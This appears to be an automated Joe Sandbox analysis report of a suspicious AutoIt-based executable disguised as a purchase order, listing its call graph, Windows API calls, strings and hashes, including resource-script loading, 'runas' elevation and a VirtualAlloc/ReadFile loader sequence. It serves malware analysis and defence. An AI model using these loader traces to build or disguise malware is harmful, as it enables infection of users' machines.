1bd4dc 47 API calls 99057->99100 99060->99047 99061->99047 99062->99047 99065 15dd83 99064->99065 99066 15dd6f 99064->99066 99102 1c359c 82 API calls __wsopen_s 99065->99102 99101 15d260 207 API calls 2 library calls 99066->99101 99068 15dd7a 99068->99047 99070 1a2f75 99070->99070 99072 15e010 99071->99072 99077 15e0dc messages 99072->99077 99105 170242 5 API calls __Init_thread_wait 99072->99105 99075 1a2fca 99075->99077 99078 15a961 22 API calls 99075->99078 99076 15a961 22 API calls 99076->99077 99077->99076 99087 15a8c7 22 API calls 99077->99087 99088 1604f0 22 API calls 99077->99088 99089 1c359c 82 API calls 99077->99089 99090 15ec40 207 API calls 99077->99090 99091 15e3e1 99077->99091 99103 15a81b 41 API calls 99077->99103 99104 16a308 207 API calls 99077->99104 99108 170242 5 API calls __Init_thread_wait 99077->99108 99109 1700a3 29 API calls __onexit 99077->99109 99110 1701f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 99077->99110 99111 1d47d4 207 API calls 99077->99111 99112 1d68c1 207 API calls 99077->99112 99080 1a2fe4 99078->99080 99106 1700a3 29 API calls __onexit 99080->99106 99084 1a2fee 99107 1701f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 99084->99107 99087->99077 99088->99077 99089->99077 99090->99077 99091->99047 99094->99047 99095->99047 99096->99047 99097->99047 99098->99057 99099->99057 99100->99057 99101->99068 99102->99070 99103->99077 99104->99077 99105->99075 99106->99084 99107->99077 99108->99077 99109->99077 99110->99077 99111->99077 99112->99077 99113 1a3a41 99117 1c10c0 99113->99117 99115 1a3a4c 99116 1c10c0 53 API calls 99115->99116 99116->99115 99118 1c10fa 99117->99118 99122 1c10cd 99117->99122 99118->99115 99119 1c10fc 99129 16fa11 53 API calls 99119->99129 99120 1c1101 99123 157510 53 API calls 99120->99123 99122->99118 99122->99119 99122->99120 99126 1c10f4 99122->99126 99124 1c1108 99123->99124 99125 156350 22 API calls 99124->99125 99125->99118 99128 15b270 39 API calls 99126->99128 99128->99118 99129->99120 99130 192ba5 99131 152b25 99130->99131 99132 192baf 99130->99132 99158 152b83 7 API calls 99131->99158 99133 153a5a 24 API calls 99132->99133 99136 192bb8 99133->99136 99138 159cb3 22 API calls 99136->99138 99140 192bc6 99138->99140 99139 152b2f 99144 153837 49 API calls 99139->99144 99149 152b44 99139->99149 99141 192bce 99140->99141 99142 192bf5 99140->99142 99143 1533c6 22 API calls 99141->99143 99145 1533c6 22 API calls 99142->99145 99146 192bd9 99143->99146 99144->99149 99157 192bf1 GetForegroundWindow ShellExecuteW 99145->99157 99147 156350 22 API calls 99146->99147 99152 192be7 99147->99152 99148 152b5f 99154 152b66 SetCurrentDirectoryW 99148->99154 99149->99148 99162 1530f2 Shell_NotifyIconW ___scrt_fastfail 99149->99162 99151 192c26 99151->99148 99155 1533c6 22 API calls 99152->99155 99156 152b7a 99154->99156 99155->99157 99157->99151 99163 152cd4 7 API calls 99158->99163 99160 152b2a 99161 152c63 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 99160->99161 99161->99139 99162->99148 99163->99160 99164 36df810 99178 36dd460 99164->99178 99166 36df8cc 99181 36df700 99166->99181 99168 36df8f5 CreateFileW 99170 36df949 99168->99170 99171 36df944 99168->99171 99170->99171 99172 36df960 VirtualAlloc 99170->99172 99172->99171 99173 36df97e ReadFile 99172->99173 99173->99171 99174 36df999 99173->99174 99175 36de700 13 API calls 99174->99175 99176 36df9cc 99175->99176 99177 36df9ef ExitProcess 99176->99177 99177->99171 99184 36e08f0 GetPEB 99178->99184 99180 36ddaeb 99180->99166 99182 36df709 Sleep 99181->99182 99183 36df717 99182->99183 99185 36e091a 99184->99185 99185->99180

                                Executed Functions

                                Function 001542DE Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 235libraryloaderCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 234 1542de-15434d call 15a961 GetVersionExW call 156b57 239 154353 234->239 240 193617-19362a 234->240 242 154355-154357 239->242 241 19362b-19362f 240->241 243 193631 241->243 244 193632-19363e 241->244 245 15435d-1543bc call 1593b2 call 1537a0 242->245 246 193656 242->246 243->244 244->241 248 193640-193642 244->248 262 1937df-1937e6 245->262 263 1543c2-1543c4 245->263 251 19365d-193660 246->251 248->242 250 193648-19364f 248->250 250->240 255 193651 250->255 252 15441b-154435 GetCurrentProcess IsWow64Process 251->252 253 193666-1936a8 251->253 258 154494-15449a 252->258 259 154437 252->259 253->252 256 1936ae-1936b1 253->256 255->246 260 1936db-1936e5 256->260 261 1936b3-1936bd 256->261 264 15443d-154449 258->264 259->264 268 1936f8-193702 260->268 269 1936e7-1936f3 260->269 265 1936ca-1936d6 261->265 266 1936bf-1936c5 261->266 270 1937e8 262->270 271 193806-193809 262->271 263->251 267 1543ca-1543dd 263->267 272 15444f-15445e LoadLibraryA 264->272 273 193824-193828 GetSystemInfo 264->273 265->252 266->252 274 1543e3-1543e5 267->274 275 193726-19372f 267->275 277 193715-193721 268->277 278 193704-193710 268->278 269->252 276 1937ee 270->276 279 19380b-19381a 271->279 280 1937f4-1937fc 271->280 281 154460-15446e GetProcAddress 272->281 282 15449c-1544a6 GetSystemInfo 272->282 284 19374d-193762 274->284 285 1543eb-1543ee 274->285 286 19373c-193748 275->286 287 193731-193737 275->287 276->280 277->252 278->252 279->276 288 19381c-193822 279->288 280->271 281->282 289 154470-154474 GetNativeSystemInfo 281->289 283 154476-154478 282->283 290 154481-154493 283->290 291 15447a-15447b FreeLibrary 283->291 294 19376f-19377b 284->294 295 193764-19376a 284->295 292 1543f4-15440f 285->292 293 193791-193794 285->293 286->252 287->252 288->280 289->283 291->290 297 154415 292->297 298 193780-19378c 292->298 293->252 296 19379a-1937c1 293->296 294->252 295->252 299 1937ce-1937da 296->299 300 1937c3-1937c9 296->300 297->252 298->252 299->252 300->252
                                APIs
                                • GetVersionExW.KERNEL32(?), ref: 0015430D
                                  • Part of subcall function 00156B57: _wcslen.LIBCMT ref: 00156B6A
                                • GetCurrentProcess.KERNEL32(?,001ECB64,00000000,?,?), ref: 00154422
                                • IsWow64Process.KERNEL32(00000000,?,?), ref: 00154429
                                • LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00154454
                                • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00154466
                                • GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 00154474
                                • FreeLibrary.KERNEL32(00000000,?,?), ref: 0015447B
                                • GetSystemInfo.KERNEL32(?,?,?), ref: 001544A0
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
                                • String ID: GetNativeSystemInfo$kernel32.dll$|O
                                • API String ID: 3290436268-3101561225
                                • Opcode ID: 240c760eb0e82da9d2a588675ec6738c74e7775eb517bcdbb185bff271dcdb08
                                • Instruction ID: 22279f1435e5948761dc6f94fb5d01f71915e6be01572e06a91aeca22725e525
                                • Opcode Fuzzy Hash: 240c760eb0e82da9d2a588675ec6738c74e7775eb517bcdbb185bff271dcdb08
                                • Instruction Fuzzy Hash: DCA1B66290A2C0EFCB35CBE97C4C9997FA67B36304B0874D9E45197A61D33046ABCB61
                                Function 001542A2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1270 1542a2-1542ba CreateStreamOnHGlobal 1271 1542bc-1542d3 FindResourceExW 1270->1271 1272 1542da-1542dd 1270->1272 1273 1935ba-1935c9 LoadResource 1271->1273 1274 1542d9 1271->1274 1273->1274 1275 1935cf-1935dd SizeofResource 1273->1275 1274->1272 1275->1274 1276 1935e3-1935ee LockResource 1275->1276 1276->1274 1277 1935f4-1935fc 1276->1277 1278 193600-193612 1277->1278 1278->1274
                                APIs
                                • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,001550AA,?,?,00000000,00000000), ref: 001542B2
                                • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,001550AA,?,?,00000000,00000000), ref: 001542C9
                                • LoadResource.KERNEL32(?,00000000,?,?,001550AA,?,?,00000000,00000000,?,?,?,?,?,?,00154F20), ref: 001935BE
                                • SizeofResource.KERNEL32(?,00000000,?,?,001550AA,?,?,00000000,00000000,?,?,?,?,?,?,00154F20), ref: 001935D3
                                • LockResource.KERNEL32(001550AA,?,?,001550AA,?,?,00000000,00000000,?,?,?,?,?,?,00154F20,?), ref: 001935E6
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                • String ID: SCRIPT
                                • API String ID: 3051347437-3967369404
                                • Opcode ID: ac72ea9211f716bc877a8379519253496d4644c31e57652ac41b0543c50c65cb
                                • Instruction ID: 2d84d6eb4e90176d410e896e0c7df889038c66e723828ae807ea6bd24b13b1cf
                                • Opcode Fuzzy Hash: ac72ea9211f716bc877a8379519253496d4644c31e57652ac41b0543c50c65cb
                                • Instruction Fuzzy Hash: 2711C270200701FFD7218BA5EC88F2B7BB9EBC5B56F104169F913CA550DB71DC458660
                                Function 00192BA5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON
                                Download Yara Rule

                                Control-flow Graph

                                APIs
                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00152B6B
                                  • Part of subcall function 00153A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00221418,?,00152E7F,?,?,?,00000000), ref: 00153A78
                                  • Part of subcall function 00159CB3: _wcslen.LIBCMT ref: 00159CBD
                                • GetForegroundWindow.USER32(runas,?,?,?,?,?,00212224), ref: 00192C10
                                • ShellExecuteW.SHELL32(00000000,?,?,00212224), ref: 00192C17
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: CurrentDirectoryExecuteFileForegroundModuleNameShellWindow_wcslen
                                • String ID: runas
                                • API String ID: 448630720-4000483414
                                • Opcode ID: e50f6e55f76ede0e761e3f6fda2396a622f24f592215c04e1027b608a76ea3cb
                                • Instruction ID: ebea74c824aaa9a418887711b52f2fa7500cc38d7cba04a52d75cc58b4ae3fb6
                                • Opcode Fuzzy Hash: e50f6e55f76ede0e761e3f6fda2396a622f24f592215c04e1027b608a76ea3cb
                                • Instruction Fuzzy Hash: AC119332204345EAC718FFA0E851DAD77A4ABB6342F44142DF8765F0A2DF31955EC752
                                Function 0015BF40 Relevance: 2.4, Strings: 1, Instructions: 1178COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: BuffCharUpper
                                • String ID: p#"
                                • API String ID: 3964851224-3229190087
                                • Opcode ID: d0026ee3e753e596f81d6020c76d5e45b63fedfacbc46a82ea40d962472e60ba
                                • Instruction ID: 18b92ae40d694f8b4b1cb67cbbd9c609072b49c9e47cf5b2eff5ebb1d2d24c39
                                • Opcode Fuzzy Hash: d0026ee3e753e596f81d6020c76d5e45b63fedfacbc46a82ea40d962472e60ba
                                • Instruction Fuzzy Hash: 2EA26A74A08301DFC715DF18C480B6ABBE1BF99304F15896DE8AA9B352D771EC49CB92
                                Function 0015D730 Relevance: 21.6, APIs: 14, Instructions: 621windowsleeptimeCOMMON
                                Download Yara Rule
                                APIs
                                • GetInputState.USER32 ref: 0015D807
                                • timeGetTime.WINMM ref: 0015DA07
                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0015DB28
                                • TranslateMessage.USER32(?), ref: 0015DB7B
                                • DispatchMessageW.USER32(?), ref: 0015DB89
                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0015DB9F
                                • Sleep.KERNEL32(0000000A), ref: 0015DBB1
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
                                • String ID:
                                • API String ID: 2189390790-0
                                • Opcode ID: 0577c5e354dd718572b26cae2bed41be53fd03a8aed88c9ea8e76b7ff5336e3d
                                • Instruction ID: 9eef2bd8b21c24a71ea063b0ad71f7351fae7f4cc0c81e5461f4bfac29f06e6a
                                • Opcode Fuzzy Hash: 0577c5e354dd718572b26cae2bed41be53fd03a8aed88c9ea8e76b7ff5336e3d
                                • Instruction Fuzzy Hash: C0422434608341EFD739CF24D884BAAB7E1BF56315F14851DF8668B2A1D770E888CB92
                                Function 0015344D Relevance: 19.5, APIs: 6, Strings: 5, Instructions: 201registryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                APIs
                                  • Part of subcall function 00153A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00221418,?,00152E7F,?,?,?,00000000), ref: 00153A78
                                  • Part of subcall function 00153357: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00153379
                                • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 0015356A
                                • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0019318D
                                • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 001931CE
                                • RegCloseKey.ADVAPI32(?), ref: 00193210
                                • _wcslen.LIBCMT ref: 00193277
                                • _wcslen.LIBCMT ref: 00193286
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                                • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\$t?
                                • API String ID: 98802146-1493328028
                                • Opcode ID: 0ff29d405239d2da6a50f1fa2476e460c1d8468c49a05931a03197ba08b14e13
                                • Instruction ID: 387e2a8fa13d084288f1438e1125601ca0a7066f27d1997106f025b3993c0680
                                • Opcode Fuzzy Hash: 0ff29d405239d2da6a50f1fa2476e460c1d8468c49a05931a03197ba08b14e13
                                • Instruction Fuzzy Hash: 58717D71404301FEC724EFA5EC8586BBBE8FFA4340B80146EF955971A1EB359A4ECB52
                                Function 00152CD4 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53windowregistryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                APIs
                                • GetSysColorBrush.USER32(0000000F), ref: 00152D07
                                • RegisterClassExW.USER32(00000030), ref: 00152D31
                                • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00152D42
                                • InitCommonControlsEx.COMCTL32(?), ref: 00152D5F
                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00152D6F
                                • LoadIconW.USER32(000000A9), ref: 00152D85
                                • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00152D94
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                • API String ID: 2914291525-1005189915
                                • Opcode ID: 393e87357262f625bcd433c5f229192c53d5805d20eff818350458c81381a417
                                • Instruction ID: f220f92beb78e75089e2b27634b59152673c77134e32fc2e4ae806c0524f9357
                                • Opcode Fuzzy Hash: 393e87357262f625bcd433c5f229192c53d5805d20eff818350458c81381a417
                                • Instruction Fuzzy Hash: E521B2B5D01258AFDB10DFE8ED89A9DBBB4FB08704F00511AF911AA2A0D7B14596CF91
                                Function 0019065B Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 372 19065b-19068b call 19042f 375 19068d-190698 call 17f2c6 372->375 376 1906a6-1906b2 call 185221 372->376 381 19069a-1906a1 call 17f2d9 375->381 382 1906cb-190714 call 19039a 376->382 383 1906b4-1906c9 call 17f2c6 call 17f2d9 376->383 392 19097d-190983 381->392 390 190781-19078a GetFileType 382->390 391 190716-19071f 382->391 383->381 396 19078c-1907bd GetLastError call 17f2a3 CloseHandle 390->396 397 1907d3-1907d6 390->397 394 190721-190725 391->394 395 190756-19077c GetLastError call 17f2a3 391->395 394->395 401 190727-190754 call 19039a 394->401 395->381 396->381 411 1907c3-1907ce call 17f2d9 396->411 399 1907d8-1907dd 397->399 400 1907df-1907e5 397->400 404 1907e9-190837 call 18516a 399->404 400->404 405 1907e7 400->405 401->390 401->395 414 190839-190845 call 1905ab 404->414 415 190847-19086b call 19014d 404->415 405->404 411->381 414->415 421 19086f-190879 call 1886ae 414->421 422 19086d 415->422 423 19087e-1908c1 415->423 421->392 422->421 424 1908c3-1908c7 423->424 425 1908e2-1908f0 423->425 424->425 428 1908c9-1908dd 424->428 429 19097b 425->429 430 1908f6-1908fa 425->430 428->425 429->392 430->429 431 1908fc-19092f CloseHandle call 19039a 430->431 434 190931-19095d GetLastError call 17f2a3 call 185333 431->434 435 190963-190977 431->435 434->435 435->429
                                APIs
                                  • Part of subcall function 0019039A: CreateFileW.KERNELBASE(00000000,00000000,?,00190704,?,?,00000000,?,00190704,00000000,0000000C), ref: 001903B7
                                • GetLastError.KERNEL32 ref: 0019076F
                                • __dosmaperr.LIBCMT ref: 00190776
                                • GetFileType.KERNELBASE(00000000), ref: 00190782
                                • GetLastError.KERNEL32 ref: 0019078C
                                • __dosmaperr.LIBCMT ref: 00190795
                                • CloseHandle.KERNEL32(00000000), ref: 001907B5
                                • CloseHandle.KERNEL32(?), ref: 001908FF
                                • GetLastError.KERNEL32 ref: 00190931
                                • __dosmaperr.LIBCMT ref: 00190938
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                • String ID: H
                                • API String ID: 4237864984-2852464175
                                • Opcode ID: dd29e7648831ef77aae96efeb2537e84f0c64d52af1e53b066db5272329f35da
                                • Instruction ID: 896c7a75568dfb04cb60b2deaf355aae5e2707f52066c283392bd72e4042ca27
                                • Opcode Fuzzy Hash: dd29e7648831ef77aae96efeb2537e84f0c64d52af1e53b066db5272329f35da
                                • Instruction Fuzzy Hash: 60A12632A041449FDF1AEFA8DC95BAE7BA1AB0A320F14415DF8159F392DB319D13CB91
                                Function 00152B83 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63windowregistryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                APIs
                                • GetSysColorBrush.USER32(0000000F), ref: 00152B8E
                                • LoadCursorW.USER32(00000000,00007F00), ref: 00152B9D
                                • LoadIconW.USER32(00000063), ref: 00152BB3
                                • LoadIconW.USER32(000000A4), ref: 00152BC5
                                • LoadIconW.USER32(000000A2), ref: 00152BD7
                                • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00152BEF
                                • RegisterClassExW.USER32(?), ref: 00152C40
                                  • Part of subcall function 00152CD4: GetSysColorBrush.USER32(0000000F), ref: 00152D07
                                  • Part of subcall function 00152CD4: RegisterClassExW.USER32(00000030), ref: 00152D31
                                  • Part of subcall function 00152CD4: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00152D42
                                  • Part of subcall function 00152CD4: InitCommonControlsEx.COMCTL32(?), ref: 00152D5F
                                  • Part of subcall function 00152CD4: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00152D6F
                                  • Part of subcall function 00152CD4: LoadIconW.USER32(000000A9), ref: 00152D85
                                  • Part of subcall function 00152CD4: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00152D94
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                • String ID: #$0$AutoIt v3
                                • API String ID: 423443420-4155596026
                                • Opcode ID: c619eebd999e65a80e4f93fded6aea761491e80e4d3b47599afd59e7125f83f3
                                • Instruction ID: 1304dc6d78f2f16c4ba3c4b46fe6eae8ac0fdc18bf6d3dc6ab4368f21da69224
                                • Opcode Fuzzy Hash: c619eebd999e65a80e4f93fded6aea761491e80e4d3b47599afd59e7125f83f3
                                • Instruction Fuzzy Hash: 0021FA71E00354BBDB20DFE5FC99E9D7FB6FB58B50F0410AAE500A66A0D7B105528F90
                                Function 0015B710 Relevance: 16.3, APIs: 1, Strings: 8, Instructions: 587COMMON
                                Download Yara Rule
                                APIs
                                • __Init_thread_footer.LIBCMT ref: 0015BB4E
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Init_thread_footer
                                • String ID: p#"$p#"$p#"$p#"$p%"$p%"$x#"$x#"
                                • API String ID: 1385522511-472378502
                                • Opcode ID: 139e494c872fa41b7d973e50d48a697de931f71e8f7b9ae1669ed628fd49fdbf
                                • Instruction ID: ea858f5c6a0ce23db74ff6d3d8262d06f45044c58e647233fbd964ba8a41ae3d
                                • Opcode Fuzzy Hash: 139e494c872fa41b7d973e50d48a697de931f71e8f7b9ae1669ed628fd49fdbf
                                • Instruction Fuzzy Hash: CC32EB78A08209EFCB24CF54C884ABAB7B9FF49301F158059ED25AF291C775ED49CB91
                                Function 00153170 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 145windowtimeregistryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
